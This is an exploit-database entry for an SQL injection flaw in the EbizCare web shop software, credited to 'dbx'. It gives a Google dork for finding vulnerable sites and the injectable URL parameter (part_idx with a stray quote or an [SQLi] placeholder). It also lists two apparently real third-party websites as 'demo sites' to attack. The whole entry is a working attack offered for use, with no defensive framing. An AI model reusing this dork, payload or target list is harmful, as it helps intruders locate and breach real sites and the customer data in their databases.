EbizCare => SQL Injection Vulnerability

2012-03-05T00:00:00
ID 1337DAY-ID-17626
Type zdt
Reporter dbx
Modified 2012-03-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ===========================================================

[+] Exploit Title: EbizCare => SQL Injection Vulnerability
[+] Date: March 05, 2012
[+] Author: dbx
[+] Vendor or Software Link: http://www.ebizcare.com/
[+] Category: WebApps
[+] Google dork: inurl: "product_list.php?part_idx="
[+] Tested on: Windows Vista 64-Bit

============================================================

[~] Exploit:

http://www.host.com/default/product_list.php?part_idx=35'

http://www.host.com/default/product_list.php?part_idx=[SQLi]

[~] Demo site:

http://www.animepia.com/default/product_list.php?part_idx=206'

http://vladofootwear.com/default/product_list.php?part_idx=407'

###############################################################



#  0day.today [2018-01-10]  #